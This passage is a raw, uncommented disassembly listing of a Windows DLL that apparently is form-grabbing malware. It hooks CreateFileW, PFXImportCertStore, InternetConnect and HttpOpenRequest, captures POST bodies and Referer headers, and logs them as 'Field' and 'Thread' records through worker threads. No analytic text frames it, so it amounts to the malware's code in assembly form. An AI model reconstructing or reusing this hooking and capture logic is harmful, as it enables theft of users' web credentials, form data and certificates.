call ds:lstrcpyA ; lstrcpyA
loc_100125AC: ; CODE XREF: sub_10011E49+749�j
push 2Fh ; Val
lea eax, [ebp+Str2]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_100125F9
push 2Fh ; Val
lea ecx, [ebp+Str2]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
push eax ; lpString2
lea edx, [ebp+String]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 2Fh ; Val
lea eax, [ebp+Str2]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 0
jmp short loc_1001260B
; ---------------------------------------------------------------------------
loc_100125F9: ; CODE XREF: sub_10011E49+777�j
push offset asc_100238A0 ; "/"
lea ecx, [ebp+String]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_1001260B: ; CODE XREF: sub_10011E49+7AE�j
push 0 ; int
lea edx, [ebp+Str2]
push edx ; Str2
lea eax, [ebp+String2]
push eax ; Str
call sub_1000F2AB
add esp, 0Ch
test eax, eax
jz loc_1001276B
push 0 ; int
lea ecx, [ebp+String]
push ecx ; Str2
mov edx, [ebp+lpString]
push edx ; Str
call sub_1000F2AB
add esp, 0Ch
test eax, eax
jz loc_1001276B
loc_1001264B: ; CODE XREF: sub_10011E49+82D�j
mov eax, [ebp+var_490]
cmp dword_10073A5C[eax*4], 0
jz short loc_10012678
cmp [ebp+var_490], 190h
jge short loc_10012678
mov ecx, [ebp+var_490]
add ecx, 1
mov [ebp+var_490], ecx
jmp short loc_1001264B
; ---------------------------------------------------------------------------
loc_10012678: ; CODE XREF: sub_10011E49+810�j
; sub_10011E49+81C�j
push 18h ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_490]
mov dword_10073A5C[edx*4], eax
mov eax, [ebp+var_1C]
add eax, 3E8h
mov ecx, [ebp+var_490]
mov edx, dword_10073A5C[ecx*4]
mov [edx], eax
mov eax, [ebp+var_490]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ebp+var_38C]
mov [ecx+8], edx
mov eax, [ebp+var_490]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ebp+arg_1C]
mov [ecx+0Ch], edx
push 4Ch ; Val
mov eax, [ebp+var_1C]
mov ecx, dword_10035724[eax*4]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_10012700
mov edx, [ebp+var_490]
mov eax, dword_10073A5C[edx*4]
mov dword ptr [eax+10h], 2
jmp short loc_10012714
; ---------------------------------------------------------------------------
loc_10012700: ; CODE XREF: sub_10011E49+89F�j
mov ecx, [ebp+var_490]
mov edx, dword_10073A5C[ecx*4]
mov dword ptr [edx+10h], 0
loc_10012714: ; CODE XREF: sub_10011E49+8B5�j
lea eax, [ebp+String2]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_490]
mov edx, dword_10073A5C[ecx*4]
mov [edx+4], eax
lea eax, [ebp+String2]
push eax ; lpString2
mov ecx, [ebp+var_490]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+4]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov ecx, [ebp+var_594]
add ecx, 1
mov [ebp+var_594], ecx
loc_1001276B: ; CODE XREF: sub_10011E49+7DC�j
; sub_10011E49+7FC�j
mov edx, [ebp+var_1C]
add edx, 1
mov [ebp+var_1C], edx
jmp loc_1001252D
; ---------------------------------------------------------------------------
loc_10012779: ; CODE XREF: sub_10011E49+6EF�j
; sub_10011E49+6FC�j
push offset aPost ; "POST"
mov eax, [ebp+Str1]
push eax ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_1001285C
loc_10012792: ; CODE XREF: sub_10011E49+974�j
mov ecx, [ebp+var_490]
cmp dword_10073A5C[ecx*4], 0
jz short loc_100127BF
cmp [ebp+var_490], 190h
jge short loc_100127BF
mov edx, [ebp+var_490]
add edx, 1
mov [ebp+var_490], edx
jmp short loc_10012792
; ---------------------------------------------------------------------------
loc_100127BF: ; CODE XREF: sub_10011E49+957�j
; sub_10011E49+963�j
push 18h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_490]
mov dword_10073A5C[ecx*4], eax
mov edx, [ebp+var_490]
mov eax, dword_10073A5C[edx*4]
mov dword ptr [eax], 0FFFFFFFFh
mov ecx, [ebp+var_490]
mov edx, dword_10073A5C[ecx*4]
mov eax, [ebp+var_38C]
mov [edx+8], eax
mov ecx, [ebp+var_490]
mov edx, dword_10073A5C[ecx*4]
mov dword ptr [edx+0Ch], 0FFFFFFFFh
lea eax, [ebp+String2]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_490]
mov edx, dword_10073A5C[ecx*4]
mov [edx+4], eax
lea eax, [ebp+String2]
push eax ; lpString2
mov ecx, [ebp+var_490]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+4]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_1001285C: ; CODE XREF: sub_10011E49+943�j
mov ecx, [ebp+lpString]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_15
jmp short loc_1001287B
sub_10011E49 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_15. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10011E49
loc_1001287B: ; CODE XREF: sub_10011E49+A2F�j
mov eax, [ebp+var_38C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 20h
; END OF FUNCTION CHUNK FOR sub_10011E49
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10012894(int, wchar_t *lpWideCharStr, int, char *Source, size_t Count)
sub_10012894 proc near ; DATA XREF: sub_1001338E+75�o
; sub_100134D4+75�o
var_140 = dword ptr -140h
Dest = dword ptr -13Ch
lpParameter = dword ptr -138h
var_134 = dword ptr -134h
Memory = dword ptr -130h
var_12C = dword ptr -12Ch
lpString = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
cbMultiByte = dword ptr -11Ch
Str = byte ptr -118h
var_117 = byte ptr -117h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpWideCharStr = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
Count = dword ptr 18h
; FUNCTION CHUNK AT 10012DB7 SIZE 00000019 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E588
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFED0h
push ebx
push esi
push edi
mov [ebp+var_134], 0
mov [ebp+var_12C], 0
mov [ebp+Str], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_117]
rep stosd
stosw
stosb
mov [ebp+lpString], 0
mov [ebp+var_124], 0FFh
mov [ebp+var_4], 0
lea eax, [ebp+var_124]
push eax
lea ecx, [ebp+Str]
push ecx
push 22h
mov edx, [ebp+arg_0]
push edx
call ds:InternetQueryOptionA ; InternetQueryOptionA
mov [ebp+var_140], eax
loc_10012922: ; CODE XREF: sub_10012894+4EF�j
mov eax, [ebp+var_134]
cmp dword_10073A5C[eax*4], 0
jz loc_10012D88
cmp [ebp+var_134], 190h
jge loc_10012D88
mov ecx, [ebp+var_134]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+8]
cmp eax, [ebp+arg_0]
jnz loc_10012D74
cmp [ebp+lpWideCharStr], 0
jz loc_10012AEF
mov ecx, [ebp+lpWideCharStr]
push ecx ; Str
call ds:__imp_wcslen
add esp, 4
lea edx, [eax+eax+1]
mov [ebp+cbMultiByte], edx
cmp [ebp+cbMultiByte], 1
jle loc_10012AEF
mov eax, [ebp+cbMultiByte]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Memory], eax
mov ecx, [ebp+cbMultiByte]
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Dest], eax
mov edx, [ebp+cbMultiByte]
push edx ; Size
push 0 ; Val
mov eax, [ebp+Dest]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
mov ecx, [ebp+cbMultiByte]
push ecx ; cbMultiByte
mov edx, [ebp+Memory]
push edx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
mov eax, [ebp+lpWideCharStr]
push eax ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:WideCharToMultiByte ; WideCharToMultiByte
push 0FFFFFFFFh ; int
mov ecx, [ebp+Dest]
push ecx ; Dest
push offset dword_10073E0C ; int
push offset aAcceptEncoding ; "\r\nAccept-Encoding: gzip, deflate"
mov edx, [ebp+Memory]
push edx ; lpString2
call sub_100012D1
add esp, 14h
mov eax, [ebp+lpWideCharStr]
push eax ; Str
call ds:__imp_wcslen
add esp, 4
push eax ; cchWideChar
mov ecx, [ebp+lpWideCharStr]
push ecx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
mov edx, [ebp+Dest]
push edx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, [ebp+cbMultiByte]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString], eax
push offset aReferer ; "Referer"
mov ecx, [ebp+Memory]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10012ACF
push offset aReferer_0 ; "Referer"
mov edx, [ebp+Memory]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; lpString2
mov eax, [ebp+lpString]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov ecx, [ebp+lpString]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jle short loc_10012ACF
push offset asc_100238E0 ; "\r\n"
mov edx, [ebp+lpString]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10012ACF
push offset asc_100238E4 ; "\r\n"
mov eax, [ebp+lpString]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
mov byte ptr [eax+2], 0
loc_10012ACF: ; CODE XREF: sub_10012894+1D3�j
; sub_10012894+207�j ...
mov ecx, [ebp+Memory]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+Dest]
push edx ; Memory
call ds:free ; free
add esp, 4
loc_10012AEF: ; CODE XREF: sub_10012894+CF�j
; sub_10012894+F3�j
cmp [ebp+Count], 0
jz loc_10012D15
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_100238E8 ; "---------------"
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
mov eax, [ebp+var_134]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx+4]
push edx ; Source
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_100238F8 ; "--------------\r\n"
call sub_1000291D
add esp, 0Ch
cmp [ebp+lpString], 0
jz short loc_10012B75
mov eax, [ebp+lpString]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jle short loc_10012B65
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
mov ecx, [ebp+lpString]
push ecx ; Source
call sub_1000291D
add esp, 0Ch
loc_10012B65: ; CODE XREF: sub_10012894+2BC�j
mov edx, [ebp+lpString]
push edx ; Memory
call ds:free ; free
add esp, 4
loc_10012B75: ; CODE XREF: sub_10012894+2AB�j
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset aField ; "Field :\r\n"
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset String1 ; Source
call sub_1000291D
add esp, 0Ch
push 8000h ; Size
push 0 ; Val
push offset String1 ; Dst
call memset ; memset
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset aThread ; "\r\n\r\nThread: "
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
mov eax, [ebp+Count]
push eax ; int
mov ecx, [ebp+Source]
push ecx ; Source
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_10023928 ; "\r\n\r\n\r\n"
call sub_1000291D
add esp, 0Ch
loc_10012BDF: ; CODE XREF: sub_10012894+47C�j
mov edx, [ebp+var_12C]
cmp Dst[edx*4], 0
jz loc_10012D15
cmp [ebp+var_12C], 190h
jge loc_10012D15
push 0 ; int
mov eax, [ebp+var_12C]
mov ecx, Dst[eax*4]
mov edx, [ecx+4]
push edx ; Str2
lea eax, [ebp+Str]
push eax ; Str
call sub_1000F2AB
add esp, 0Ch
test eax, eax
jz loc_10012D01
push 0Ch ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpParameter], eax
mov ecx, [ebp+lpParameter]
mov dword ptr [ecx], 1
mov edx, [ebp+var_134]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax+4]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+lpParameter]
mov [edx+4], eax
mov eax, [ebp+var_134]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx+4]
push edx ; lpString2
mov eax, [ebp+lpParameter]
mov ecx, [eax+4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+Count]
add edx, 1
push edx ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+lpParameter]
mov [ecx+8], eax
mov edx, [ebp+Count]
add edx, 1
push edx ; Size
push 0 ; Val
mov eax, [ebp+lpParameter]
mov ecx, [eax+8]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
mov edx, [ebp+Count]
push edx ; Count
mov eax, [ebp+Source]
push eax ; Source
mov ecx, [ebp+lpParameter]
mov edx, [ecx+8]
push edx ; Dest
call ds:strncat ; strncat
add esp, 0Ch
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov eax, [ebp+lpParameter]
push eax ; lpParameter
push offset sub_10010623 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_10012D01: ; CODE XREF: sub_10012894+393�j
mov ecx, [ebp+var_12C]
add ecx, 1
mov [ebp+var_12C], ecx
jmp loc_10012BDF
; ---------------------------------------------------------------------------
loc_10012D15: ; CODE XREF: sub_10012894+25F�j
; sub_10012894+359�j ...
mov edx, [ebp+var_134]
mov eax, dword_10073A5C[edx*4]
cmp dword ptr [eax+0Ch], 0FFFFFFFFh
jnz short loc_10012D6A
mov ecx, [ebp+var_134]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+4]
push eax ; Memory
call ds:free ; free
add esp, 4
mov ecx, [ebp+var_134]
mov edx, dword_10073A5C[ecx*4]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, [ebp+var_134]
mov dword_10073A5C[eax*4], 0
loc_10012D6A: ; CODE XREF: sub_10012894+492�j
mov [ebp+var_134], 190h
loc_10012D74: ; CODE XREF: sub_10012894+C5�j
mov ecx, [ebp+var_134]
add ecx, 1
mov [ebp+var_134], ecx
jmp loc_10012922
; ---------------------------------------------------------------------------
loc_10012D88: ; CODE XREF: sub_10012894+9C�j
; sub_10012894+AC�j
mov edx, [ebp+Count]
push edx
mov eax, [ebp+Source]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+lpWideCharStr]
push edx
mov eax, [ebp+arg_0]
push eax
call dword_10073D9C
mov [ebp+var_120], eax
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_16
jmp short loc_10012DB7
sub_10012894 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_16. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10012894
loc_10012DB7: ; CODE XREF: sub_10012894+520�j
mov eax, [ebp+var_120]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 14h
; END OF FUNCTION CHUNK FOR sub_10012894
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10012DD0(int, LPCSTR lpString1, int, char *Source, size_t Count)
sub_10012DD0 proc near ; DATA XREF: sub_1001338E+8C�o
; sub_100134D4+8C�o
var_13C = dword ptr -13Ch
lpString2 = dword ptr -138h
lpParameter = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
Str = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
Size = dword ptr -11Ch
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpString1 = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
Count = dword ptr 18h
; FUNCTION CHUNK AT 10013290 SIZE 00000019 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E598
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFED4h
push ebx
push esi
push edi
mov [ebp+var_130], 0
mov [ebp+var_12C], 0
mov [ebp+var_118], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_117]
rep stosd
stosw
stosb
mov [ebp+Str], 0
mov [ebp+var_124], 0FFh
mov [ebp+var_4], 0
lea eax, [ebp+var_124]
push eax
lea ecx, [ebp+var_118]
push ecx
push 22h
mov edx, [ebp+arg_0]
push edx
call ds:InternetQueryOptionA ; InternetQueryOptionA
mov [ebp+var_13C], eax
loc_10012E5E: ; CODE XREF: sub_10012DD0+48C�j
mov eax, [ebp+var_130]
cmp dword_10073A5C[eax*4], 0
jz loc_10013261
cmp [ebp+var_130], 190h
jge loc_10013261
mov ecx, [ebp+var_130]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+8]
cmp eax, [ebp+arg_0]
jnz loc_1001324D
cmp [ebp+lpString1], 0
jz loc_10012FC8
mov ecx, [ebp+lpString1]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
mov [ebp+Size], eax
cmp [ebp+Size], 1
jle loc_10012FC8
mov edx, [ebp+Size]
push edx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString2], eax
mov eax, [ebp+Size]
push eax ; Size
push 0 ; Val
mov ecx, [ebp+lpString2]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 0FFFFFFFFh ; int
mov edx, [ebp+lpString2]
push edx ; Dest
push offset dword_10073E10 ; int
push offset aAcceptEncodi_0 ; "\r\nAccept-Encoding: gzip, deflate"
mov eax, [ebp+lpString1]
push eax ; lpString2
call sub_100012D1
add esp, 14h
mov ecx, [ebp+lpString2]
push ecx ; lpString2
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov eax, [ebp+Size]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Str], eax
push offset aReferer_1 ; "Referer"
mov ecx, [ebp+lpString2]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10012FB8
push offset aReferer_2 ; "Referer"
mov edx, [ebp+lpString2]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; lpString2
mov eax, [ebp+Str]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov ecx, [ebp+Str]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jle short loc_10012FB8
push offset asc_10023964 ; "\r\n"
mov edx, [ebp+Str]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10012FB8
push offset asc_10023968 ; "\r\n"
mov eax, [ebp+Str]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
mov byte ptr [eax+2], 0
loc_10012FB8: ; CODE XREF: sub_10012DD0+180�j
; sub_10012DD0+1B4�j ...
mov ecx, [ebp+lpString2]
push ecx ; Memory
call ds:free ; free
add esp, 4
loc_10012FC8: ; CODE XREF: sub_10012DD0+CF�j
; sub_10012DD0+EF�j
cmp [ebp+Count], 0
jz loc_100131EE
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_1002396C ; "---------------"
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
mov edx, [ebp+var_130]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax+4]
push ecx ; Source
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_1002397C ; "--------------\r\n"
call sub_1000291D
add esp, 0Ch
cmp [ebp+Str], 0
jz short loc_1001304E
mov edx, [ebp+Str]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jle short loc_1001303E
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
mov eax, [ebp+Str]
push eax ; Source
call sub_1000291D
add esp, 0Ch
loc_1001303E: ; CODE XREF: sub_10012DD0+259�j
mov ecx, [ebp+Str]
push ecx ; Memory
call ds:free ; free
add esp, 4
loc_1001304E: ; CODE XREF: sub_10012DD0+248�j
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset aField_0 ; "Field :\r\n"
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset String1 ; Source
call sub_1000291D
add esp, 0Ch
push 8000h ; Size
push 0 ; Val
push offset String1 ; Dst
call memset ; memset
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset aThread_0 ; "\r\n\r\nThread: "
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
mov edx, [ebp+Count]
push edx ; int
mov eax, [ebp+Source]
push eax ; Source
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_100239AC ; "\r\n\r\n\r\n"
call sub_1000291D
add esp, 0Ch
loc_100130B8: ; CODE XREF: sub_10012DD0+419�j
mov ecx, [ebp+var_12C]
cmp Dst[ecx*4], 0
jz loc_100131EE
cmp [ebp+var_12C], 190h
jge loc_100131EE
push 0 ; int
mov edx, [ebp+var_12C]
mov eax, Dst[edx*4]
mov ecx, [eax+4]
push ecx ; Str2
lea edx, [ebp+var_118]
push edx ; Str
call sub_1000F2AB
add esp, 0Ch
test eax, eax
jz loc_100131DA
push 0Ch ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpParameter], eax
mov eax, [ebp+lpParameter]
mov dword ptr [eax], 1
mov ecx, [ebp+var_130]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+4]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+lpParameter]
mov [ecx+4], eax
mov edx, [ebp+var_130]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax+4]
push ecx ; lpString2
mov edx, [ebp+lpParameter]
mov eax, [edx+4]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov ecx, [ebp+Count]
add ecx, 1
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+lpParameter]
mov [edx+8], eax
mov eax, [ebp+Count]
add eax, 1
push eax ; Size
push 0 ; Val
mov ecx, [ebp+lpParameter]
mov edx, [ecx+8]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+Count]
push eax ; Count
mov ecx, [ebp+Source]
push ecx ; Source
mov edx, [ebp+lpParameter]
mov eax, [edx+8]
push eax ; Dest
call ds:strncat ; strncat
add esp, 0Ch
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov ecx, [ebp+lpParameter]
push ecx ; lpParameter
push offset sub_10010623 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_100131DA: ; CODE XREF: sub_10012DD0+330�j
mov edx, [ebp+var_12C]
add edx, 1
mov [ebp+var_12C], edx
jmp loc_100130B8
; ---------------------------------------------------------------------------
loc_100131EE: ; CODE XREF: sub_10012DD0+1FC�j
; sub_10012DD0+2F6�j ...
mov eax, [ebp+var_130]
mov ecx, dword_10073A5C[eax*4]
cmp dword ptr [ecx+0Ch], 0FFFFFFFFh
jnz short loc_10013243
mov edx, [ebp+var_130]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax+4]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+var_130]
mov eax, dword_10073A5C[edx*4]
push eax ; Memory
call ds:free ; free
add esp, 4
mov ecx, [ebp+var_130]
mov dword_10073A5C[ecx*4], 0
loc_10013243: ; CODE XREF: sub_10012DD0+42F�j
mov [ebp+var_130], 190h
loc_1001324D: ; CODE XREF: sub_10012DD0+C5�j
mov edx, [ebp+var_130]
add edx, 1
mov [ebp+var_130], edx
jmp loc_10012E5E
; ---------------------------------------------------------------------------
loc_10013261: ; CODE XREF: sub_10012DD0+9C�j
; sub_10012DD0+AC�j
mov eax, [ebp+Count]
push eax
mov ecx, [ebp+Source]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+lpString1]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_10073DA0
mov [ebp+var_120], eax
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_17
jmp short loc_10013290
sub_10012DD0 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_17. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10012DD0
loc_10013290: ; CODE XREF: sub_10012DD0+4BD�j
mov eax, [ebp+var_120]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 14h
; END OF FUNCTION CHUNK FOR sub_10012DD0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E5A8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov dword ptr [ebp-4], 0
mov eax, [ebp+18h]
push eax
mov ecx, [ebp+14h]
push ecx
mov edx, [ebp+10h]
push edx
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call dword_10073DBC
mov [ebp-1Ch], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
call nullsub_18
jmp short loc_100132FF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_18. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_100132FF: ; CODE XREF: .text:100132FC�j
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 14h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10013315 proc near ; DATA XREF: sub_1001338E+47�o
; sub_100134D4+47�o
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
; FUNCTION CHUNK AT 10013378 SIZE 00000016 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E5B8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov [ebp+var_4], 0
mov eax, [ebp+arg_1C]
push eax
mov ecx, [ebp+arg_18]
push ecx
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov dx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_10073DA8
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_19
jmp short loc_10013378
sub_10013315 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_19. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10013315
loc_10013378: ; CODE XREF: sub_10013315+60�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 20h
; END OF FUNCTION CHUNK FOR sub_10013315
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001338E proc near ; CODE XREF: sub_100136A4+4F�p
push ebp
mov ebp, esp
call sub_100176F1
call ds:GetCurrentThread ; GetCurrentThread
push eax ; hThread
call sub_10017AB5
push offset aPvoidReal_crea ; "&(PVOID&)Real_CreateFileW"
push offset sub_100100FD
push offset dword_10073A48
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_pfxi ; "&(PVOID&)Real_PFXImportCertStore"
push offset sub_1000FFF9
push offset dword_10073DC8
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_inte ; "&(PVOID&)Real_InternetConnect"
push offset sub_10013315
push offset dword_10073DA8
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_http ; "&(PVOID&)Real_HttpOpenRequest"
push offset sub_10011E49
